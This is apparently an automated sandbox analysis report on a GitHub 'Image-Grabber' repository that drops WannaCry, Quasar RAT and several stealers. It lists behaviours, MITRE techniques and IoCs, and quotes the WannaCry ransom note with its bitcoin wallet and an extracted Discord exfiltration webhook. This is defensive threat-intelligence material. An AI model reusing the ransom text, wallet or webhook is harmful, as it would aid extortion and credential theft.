mercurialgrabber | hxxps://github[.]com/LuNaTiiiK/Image-Grabber/tree/main/Tools%20priv%C3%A9

Resubmissions

13-05-2024 20:39

240513-zfn33ach7x 1

11-05-2024 16:59

240511-vhrjragd9t 10

Analysis

max time kernel
574s
max time network
572s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
11-05-2024 16:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/LuNaTiiiK/Image-Grabber/tree/main/Tools%20priv%C3%A9

Score

10^/10

mercurialgrabber quasar stormkitty wannacry defense_evasion discovery evasion execution impact persistence pyinstaller ransomware spyware stealer trojan upx worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Extracted

Family

mercurialgrabber

https://discord.com/api/webhooks/941297591063293953/-9qOQ2gz3qoxkTxwZby1gPLv-nfkx8bgzr0CRRgkzO4TIaagCHQ8rdTIVMM_nDgknWcc

Signatures

Contains code to disable Windows Defender 3 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral1/files/0x000400000001da1b-2440.dat	disable_win_def
behavioral1/files/0x000800000001da45-2457.dat	disable_win_def
behavioral1/memory/4628-2469-0x00000000002B0000-0x00000000002D8000-memory.dmp	disable_win_def

Mercurial Grabber Stealer
Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.
stealer mercurialgrabber
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral1/files/0x000c00000002333b-4190.dat	family_quasar

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 3 IoCs

resource	yara_rule
behavioral1/files/0x000400000001da1b-2440.dat	family_stormkitty
behavioral1/files/0x000800000001da45-2457.dat	family_stormkitty
behavioral1/memory/4628-2469-0x00000000002B0000-0x00000000002D8000-memory.dmp	family_stormkitty

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Looks for VirtualBox Guest Additions in registry 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions	Image_Grabber Made by Flow $ Aether.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions	Image_Grabber Made by Flow $ Aether.exe

Downloads MZ/PE file

Looks for VMWare Tools registry key 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools	Image_Grabber Made by Flow $ Aether.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools	Image_Grabber Made by Flow $ Aether.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
856	netsh.exe
2284	netsh.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Image_Grabber Made by Flow $ Aether.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Image_Grabber Made by Flow $ Aether.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	image grabber.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	image grabber.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	cmd.exe

Drops startup file 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD2F05.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD2F1C.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glx-Image-Logger.exe	Glx-Image-Logger.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glx-Image-Logger.exe	Glx-Image-Logger.exe

Executes dropped EXE 64 IoCs

pid	Process
1288	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
4920	taskdl.exe
3420	@[email protected]
1648	@[email protected]
4592	taskhsvc.exe
3832	taskdl.exe
400	taskse.exe
2252	@[email protected]
2496	taskdl.exe
2072	taskse.exe
1972	@[email protected]
1796	@[email protected]
64	taskdl.exe
3784	taskse.exe
1436	@[email protected]
3124	image grabber.exe
4628	GRABBER.EXE
1496	IMAGE LOGGER.EXE
4876	IMAGE LOGGER.EXE
4956	taskse.exe
4924	@[email protected]
3236	taskdl.exe
4780	taskse.exe
1312	@[email protected]
3932	taskdl.exe
776	taskse.exe
3748	@[email protected]
4956	taskdl.exe
1324	Setup.py.exe
660	Setup.py.exe
1124	taskse.exe
1012	@[email protected]
208	taskdl.exe
4260	taskse.exe
3940	@[email protected]
3960	taskdl.exe
4740	taskse.exe
776	@[email protected]
3596	taskdl.exe
3960	image grabber.exe
3648	GRABBER.EXE
4816	IMAGE LOGGER.EXE
4700	IMAGE LOGGER.EXE
1824	Image_Grabber Made by Flow $ Aether.exe
1212	taskse.exe
324	@[email protected]
1752	taskdl.exe
1232	taskse.exe
1764	@[email protected]
4740	taskdl.exe
3692	Image_Grabber Made by Flow $ Aether.exe
4740	Setup.py.exe
1120	Setup.py.exe
4864	Grebber image.exe
5040	Client.exe
1144	taskse.exe
2112	@[email protected]
4728	taskdl.exe
1884	taskse.exe
5072	@[email protected]
616	taskdl.exe
712	taskse.exe
3044	@[email protected]
3828	taskdl.exe

Loads dropped DLL 64 IoCs

pid	Process
4592	taskhsvc.exe
4592	taskhsvc.exe
4592	taskhsvc.exe
4592	taskhsvc.exe
4592	taskhsvc.exe
4592	taskhsvc.exe
4592	taskhsvc.exe
4592	taskhsvc.exe
4876	IMAGE LOGGER.EXE
4876	IMAGE LOGGER.EXE
4876	IMAGE LOGGER.EXE
4876	IMAGE LOGGER.EXE
4876	IMAGE LOGGER.EXE
4876	IMAGE LOGGER.EXE
4876	IMAGE LOGGER.EXE
4876	IMAGE LOGGER.EXE
4876	IMAGE LOGGER.EXE
4876	IMAGE LOGGER.EXE
4876	IMAGE LOGGER.EXE
4876	IMAGE LOGGER.EXE
4876	IMAGE LOGGER.EXE
4876	IMAGE LOGGER.EXE
4876	IMAGE LOGGER.EXE
4876	IMAGE LOGGER.EXE
4876	IMAGE LOGGER.EXE
4876	IMAGE LOGGER.EXE
4876	IMAGE LOGGER.EXE
4876	IMAGE LOGGER.EXE
4876	IMAGE LOGGER.EXE
4876	IMAGE LOGGER.EXE
4876	IMAGE LOGGER.EXE
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
660	Setup.py.exe
4700	IMAGE LOGGER.EXE
4700	IMAGE LOGGER.EXE

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4732	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/660-2809-0x00007FFEBFA10000-0x00007FFEBFFF8000-memory.dmp	upx
behavioral1/memory/660-2810-0x00007FFEDB530000-0x00007FFEDB554000-memory.dmp	upx
behavioral1/memory/660-2811-0x00007FFEDC780000-0x00007FFEDC78F000-memory.dmp	upx
behavioral1/memory/660-2812-0x00007FFEDB510000-0x00007FFEDB529000-memory.dmp	upx
behavioral1/memory/660-2813-0x00007FFEDB500000-0x00007FFEDB50D000-memory.dmp	upx
behavioral1/memory/660-2815-0x00007FFED9C80000-0x00007FFED9CAD000-memory.dmp	upx
behavioral1/memory/660-2814-0x00007FFEDB4E0000-0x00007FFEDB4F9000-memory.dmp	upx
behavioral1/memory/660-2816-0x00007FFED3B90000-0x00007FFED3BB3000-memory.dmp	upx
behavioral1/memory/660-2817-0x00007FFEC2590000-0x00007FFEC2703000-memory.dmp	upx
behavioral1/memory/660-2819-0x00007FFEC0D50000-0x00007FFEC0E08000-memory.dmp	upx
behavioral1/memory/660-2818-0x00007FFECD680000-0x00007FFECD6AE000-memory.dmp	upx
behavioral1/memory/660-2820-0x00007FFEBFA10000-0x00007FFEBFFF8000-memory.dmp	upx
behavioral1/memory/660-2821-0x00007FFEC0440000-0x00007FFEC07B5000-memory.dmp	upx
behavioral1/memory/660-2838-0x00007FFED4600000-0x00007FFED4615000-memory.dmp	upx
behavioral1/memory/660-2837-0x00007FFEDB530000-0x00007FFEDB554000-memory.dmp	upx
behavioral1/memory/660-2841-0x00007FFEC2D20000-0x00007FFEC2D34000-memory.dmp	upx
behavioral1/memory/660-2843-0x00007FFEC0320000-0x00007FFEC043C000-memory.dmp	upx
behavioral1/memory/660-2842-0x00007FFEDB510000-0x00007FFEDB529000-memory.dmp	upx
behavioral1/memory/660-2840-0x00007FFEC2D40000-0x00007FFEC2D54000-memory.dmp	upx
behavioral1/memory/660-2839-0x00007FFED3A30000-0x00007FFED3A42000-memory.dmp	upx
behavioral1/memory/660-2847-0x00007FFEC2CF0000-0x00007FFEC2D12000-memory.dmp	upx
behavioral1/memory/660-2848-0x00007FFED9C80000-0x00007FFED9CAD000-memory.dmp	upx
behavioral1/memory/660-2849-0x00007FFEC2CD0000-0x00007FFEC2CE7000-memory.dmp	upx
behavioral1/memory/660-2850-0x00007FFEC2570000-0x00007FFEC2589000-memory.dmp	upx
behavioral1/memory/660-2851-0x00007FFED3B90000-0x00007FFED3BB3000-memory.dmp	upx
behavioral1/memory/660-2855-0x00007FFEC0100000-0x00007FFEC0111000-memory.dmp	upx
behavioral1/memory/660-2854-0x00007FFEC0D00000-0x00007FFEC0D4D000-memory.dmp	upx
behavioral1/memory/660-2853-0x00007FFECD680000-0x00007FFECD6AE000-memory.dmp	upx
behavioral1/memory/660-2852-0x00007FFEC2590000-0x00007FFEC2703000-memory.dmp	upx
behavioral1/memory/660-2858-0x00007FFEC00E0000-0x00007FFEC00FE000-memory.dmp	upx
behavioral1/memory/660-2857-0x00007FFEDB4A0000-0x00007FFEDB4AA000-memory.dmp	upx
behavioral1/memory/660-2856-0x00007FFEC0D50000-0x00007FFEC0E08000-memory.dmp	upx
behavioral1/memory/660-2861-0x00007FFEBF310000-0x00007FFEBFA04000-memory.dmp	upx
behavioral1/memory/660-2859-0x00007FFEC0440000-0x00007FFEC07B5000-memory.dmp	upx
behavioral1/memory/660-2863-0x00007FFEC00A0000-0x00007FFEC00D8000-memory.dmp	upx
behavioral1/memory/660-2862-0x00007FFED4600000-0x00007FFED4615000-memory.dmp	upx
behavioral1/memory/660-2924-0x00007FFED9BE0000-0x00007FFED9BED000-memory.dmp	upx
behavioral1/memory/660-2923-0x00007FFEC0320000-0x00007FFEC043C000-memory.dmp	upx
behavioral1/memory/660-2974-0x00007FFEC2CF0000-0x00007FFEC2D12000-memory.dmp	upx
behavioral1/memory/660-3008-0x00007FFEC2CD0000-0x00007FFEC2CE7000-memory.dmp	upx
behavioral1/memory/660-3024-0x00007FFEC2570000-0x00007FFEC2589000-memory.dmp	upx
behavioral1/memory/660-3040-0x00007FFEC0D00000-0x00007FFEC0D4D000-memory.dmp	upx
behavioral1/memory/660-3081-0x00007FFEBF310000-0x00007FFEBFA04000-memory.dmp	upx
behavioral1/memory/660-3089-0x00007FFEC00A0000-0x00007FFEC00D8000-memory.dmp	upx
behavioral1/memory/660-3135-0x00007FFED9BE0000-0x00007FFED9BED000-memory.dmp	upx
behavioral1/memory/1120-4054-0x00007FFEC3020000-0x00007FFEC3608000-memory.dmp	upx
behavioral1/memory/1120-4056-0x00007FFED89F0000-0x00007FFED89FF000-memory.dmp	upx
behavioral1/memory/1120-4055-0x00007FFED40A0000-0x00007FFED40C4000-memory.dmp	upx
behavioral1/memory/1120-4058-0x00007FFED89B0000-0x00007FFED89BD000-memory.dmp	upx
behavioral1/memory/1120-4057-0x00007FFED4240000-0x00007FFED4259000-memory.dmp	upx
behavioral1/memory/1120-4060-0x00007FFED39C0000-0x00007FFED39ED000-memory.dmp	upx
behavioral1/memory/1120-4059-0x00007FFED4080000-0x00007FFED4099000-memory.dmp	upx
behavioral1/memory/1120-4062-0x00007FFEC0980000-0x00007FFEC0AF3000-memory.dmp	upx
behavioral1/memory/1120-4061-0x00007FFED3800000-0x00007FFED3823000-memory.dmp	upx
behavioral1/memory/1120-4063-0x00007FFED3730000-0x00007FFED375E000-memory.dmp	upx
behavioral1/memory/1120-4065-0x00007FFEBBBF0000-0x00007FFEBBF65000-memory.dmp	upx
behavioral1/memory/1120-4064-0x00007FFEC08C0000-0x00007FFEC0978000-memory.dmp	upx
behavioral1/memory/1120-4067-0x00007FFED4060000-0x00007FFED4075000-memory.dmp	upx
behavioral1/memory/1120-4070-0x00007FFED35C0000-0x00007FFED35D4000-memory.dmp	upx
behavioral1/memory/1120-4069-0x00007FFED3630000-0x00007FFED3644000-memory.dmp	upx
behavioral1/memory/1120-4068-0x00007FFED3EB0000-0x00007FFED3EC2000-memory.dmp	upx
behavioral1/memory/1120-4071-0x00007FFEBDAA0000-0x00007FFEBDBBC000-memory.dmp	upx
behavioral1/memory/1120-4073-0x00007FFEC4110000-0x00007FFEC4132000-memory.dmp	upx
behavioral1/memory/1120-4072-0x00007FFEC3020000-0x00007FFEC3608000-memory.dmp	upx

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\rundll32_awspeGfa_w32 = "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\LOL.BAT"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\nvidiaDValueOn = "C:\\Users\\Admin\\AppData\\Local\\NVIDIA Local Drivers\\DriversUpdateProcess_x64.exe"	GRABBER.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\rundll32_awspeGfa_w32 = "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\LOL.BAT"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\empyrean = "C:\\Users\\Admin\\AppData\\Roaming\\empyrean\\run.bat"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ppcvxtmedh378 = "\"C:\\Users\\Admin\\Downloads\\tasksche.exe\""	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs

Web Service

T1102

flow	ioc
208	discord.com
58	raw.githubusercontent.com
59	raw.githubusercontent.com
196	discord.com
197	raw.githubusercontent.com
198	raw.githubusercontent.com
137	raw.githubusercontent.com
149	discord.com
150	discord.com
151	discord.com

Looks up external IP address via web service 13 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
144	ip4.seeip.org
201	ip-api.com
205	api.ipify.org
101	checkip.dyndns.org
157	ip4.seeip.org
195	api.ipify.org
200	api.ipify.org
203	api.ipify.org
115	ip-api.com
187	api.ipify.org
186	api.ipify.org
145	ip4.seeip.org
146	ip-api.com

Maps connected drives based on registry 3 TTPs 4 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	Image_Grabber Made by Flow $ Aether.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	Image_Grabber Made by Flow $ Aether.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	Image_Grabber Made by Flow $ Aether.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	Image_Grabber Made by Flow $ Aether.exe

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\SubDir\Client.exe	Grebber image.exe
File opened for modification	C:\Windows\system32\SubDir	Grebber image.exe
File opened for modification	C:\Windows\system32\SubDir\Client.exe	Client.exe
File opened for modification	C:\Windows\system32\SubDir	Client.exe
File created	C:\Windows\system32\SubDir\Client.exe	Grebber image.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3148	sc.exe

Detects Pyinstaller 4 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000400000001da1b-2440.dat	pyinstaller
behavioral1/files/0x000200000001da67-2466.dat	pyinstaller
behavioral1/files/0x000600000001da1b-2703.dat	pyinstaller
behavioral1/files/0x00070000000237c2-5362.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 2 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S	Image_Grabber Made by Flow $ Aether.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S	Image_Grabber Made by Flow $ Aether.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Image_Grabber Made by Flow $ Aether.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	Image_Grabber Made by Flow $ Aether.exe

Collects information from the system 1 TTPs 1 IoCs

Uses WMIC.exe to find detailed system information.

Data from Local System

T1005

pid	Process
3648	WMIC.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
996	schtasks.exe
4508	schtasks.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3792	WMIC.exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery

T1057

pid	Process
4164	tasklist.exe
2184	tasklist.exe
3076	tasklist.exe
4072	tasklist.exe

Enumerates system info in registry 2 TTPs 14 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName	Image_Grabber Made by Flow $ Aether.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0	Image_Grabber Made by Flow $ Aether.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation	Image_Grabber Made by Flow $ Aether.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer	Image_Grabber Made by Flow $ Aether.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName	Image_Grabber Made by Flow $ Aether.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation	Image_Grabber Made by Flow $ Aether.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0	Image_Grabber Made by Flow $ Aether.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer	Image_Grabber Made by Flow $ Aether.exe

Gathers network information 2 TTPs 2 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4680	ipconfig.exe
4796	NETSTAT.EXE

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2748	systeminfo.exe

Kills process with taskkill 13 IoCs

evasion

pid	Process
2328	taskkill.exe
540	taskkill.exe
1796	taskkill.exe
1008	taskkill.exe
5056	taskkill.exe
1888	taskkill.exe
3704	taskkill.exe
5040	taskkill.exe
1692	taskkill.exe
4164	taskkill.exe
5068	taskkill.exe
700	taskkill.exe
2848	taskkill.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	7zFM.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
8	reg.exe
4340	reg.exe
2440	reg.exe

NTFS ADS 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 865502.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 750619.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 846763.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 863609.crdownload:SmartScreen	msedge.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
2400	NOTEPAD.EXE
2876	NOTEPAD.EXE

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3060	msedge.exe
3060	msedge.exe
4056	msedge.exe
4056	msedge.exe
4324	identity_helper.exe
4324	identity_helper.exe
540	msedge.exe
540	msedge.exe
4592	taskhsvc.exe
4592	taskhsvc.exe
4592	taskhsvc.exe
4592	taskhsvc.exe
4592	taskhsvc.exe
4592	taskhsvc.exe
444	mspaint.exe
444	mspaint.exe
1312	msedge.exe
1312	msedge.exe
1312	msedge.exe
1312	msedge.exe
1636	msedge.exe
1636	msedge.exe
2636	7zFM.exe
2636	7zFM.exe
2636	7zFM.exe
2636	7zFM.exe
2636	7zFM.exe
2636	7zFM.exe
2636	7zFM.exe
2636	7zFM.exe
2636	7zFM.exe
2636	7zFM.exe
2636	7zFM.exe
2636	7zFM.exe
2636	7zFM.exe
2636	7zFM.exe
4544	msedge.exe
4544	msedge.exe
2900	powershell.exe
2900	powershell.exe
2900	powershell.exe
1696	msedge.exe
1696	msedge.exe
1584	msedge.exe
1584	msedge.exe
3704	identity_helper.exe
3704	identity_helper.exe
3156	msedge.exe
3156	msedge.exe
220	7zFM.exe
220	7zFM.exe
220	7zFM.exe
220	7zFM.exe
220	7zFM.exe
220	7zFM.exe
4500	msedge.exe
4500	msedge.exe
4044	msedge.exe
4044	msedge.exe
4044	msedge.exe
4044	msedge.exe
4704	msedge.exe
4704	msedge.exe
220	7zFM.exe

Suspicious behavior: GetForegroundWindowSpam 5 IoCs

pid	Process
2252	@[email protected]
2636	7zFM.exe
220	7zFM.exe
1612	7zFM.exe
4328	7zFM.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 36 IoCs

pid	Process
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1284	WMIC.exe
Token: SeSecurityPrivilege	1284	WMIC.exe
Token: SeTakeOwnershipPrivilege	1284	WMIC.exe
Token: SeLoadDriverPrivilege	1284	WMIC.exe
Token: SeSystemProfilePrivilege	1284	WMIC.exe
Token: SeSystemtimePrivilege	1284	WMIC.exe
Token: SeProfSingleProcessPrivilege	1284	WMIC.exe
Token: SeIncBasePriorityPrivilege	1284	WMIC.exe
Token: SeCreatePagefilePrivilege	1284	WMIC.exe
Token: SeBackupPrivilege	1284	WMIC.exe
Token: SeRestorePrivilege	1284	WMIC.exe
Token: SeShutdownPrivilege	1284	WMIC.exe
Token: SeDebugPrivilege	1284	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1284	WMIC.exe
Token: SeRemoteShutdownPrivilege	1284	WMIC.exe
Token: SeUndockPrivilege	1284	WMIC.exe
Token: SeManageVolumePrivilege	1284	WMIC.exe
Token: 33	1284	WMIC.exe
Token: 34	1284	WMIC.exe
Token: 35	1284	WMIC.exe
Token: 36	1284	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1284	WMIC.exe
Token: SeSecurityPrivilege	1284	WMIC.exe
Token: SeTakeOwnershipPrivilege	1284	WMIC.exe
Token: SeLoadDriverPrivilege	1284	WMIC.exe
Token: SeSystemProfilePrivilege	1284	WMIC.exe
Token: SeSystemtimePrivilege	1284	WMIC.exe
Token: SeProfSingleProcessPrivilege	1284	WMIC.exe
